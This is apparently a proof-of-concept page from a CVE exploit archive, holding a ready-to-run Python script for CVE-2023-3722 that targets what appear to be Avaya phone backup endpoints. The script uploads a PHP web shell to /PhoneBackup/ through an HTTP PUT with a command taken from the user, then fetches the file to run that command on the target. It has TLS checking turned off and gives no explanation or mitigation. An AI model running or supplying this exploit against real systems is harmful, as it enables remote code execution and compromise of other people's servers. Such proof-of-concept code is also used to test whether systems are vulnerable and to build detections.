4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2023-3722.py PY
#!/usr/bin/env python3

import requests
import argparse
import random
import string
import urllib3

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def generate_random_filename():
    return ''.join(random.choices(string.digits, k=8))

def send_put_request(hostname, query_command):
    random_filename = generate_random_filename()
    url = f"https://{hostname}/PhoneBackup/{random_filename}.php"
    headers = {
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "AVAYA",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "close"
    }
    payload = f"<?php\nsystem('{query_command}');\n"

    response = requests.put(url, headers=headers, data=payload, verify=False)
    print(f"PUT request to {url} completed with status code {response.status_code}.")
    if response.status_code == 201:
        print("PHP script uploaded successfully.")
    else:
        print("Failed to upload PHP script.")

    return random_filename

def send_get_request(hostname, filename):
    url = f"https://{hostname}/PhoneBackup/{filename}.php"
    headers = {
        "Accept-Language": "en-US",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "AVAYA",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
        "Accept-Encoding": "gzip, deflate, br",
        "Priority": "u=0, i",
        "Connection": "close"
    }

    response = requests.get(url, headers=headers, verify=False)
    print(f"GET request to {url} completed with status code {response.status_code}.")
    if response.status_code == 200:
        print("Response from PHP script:")
        print(response.text)
    else:
        print("Failed to execute PHP script.")

def main():
    parser = argparse.ArgumentParser(description="HTTP Request Script with Random Filename")
    parser.add_argument("hostname", help="Target hostname (e.g., example.com:444)")
    parser.add_argument("--query", default="id", help="Command to run in the PHP script (default: id)")
    args = parser.parse_args()

    # Send PUT request to upload PHP script
    random_filename = send_put_request(args.hostname, args.query)

    # Send GET request to execute the uploaded PHP script
    send_get_request(args.hostname, random_filename)

if __name__ == "__main__":
    main()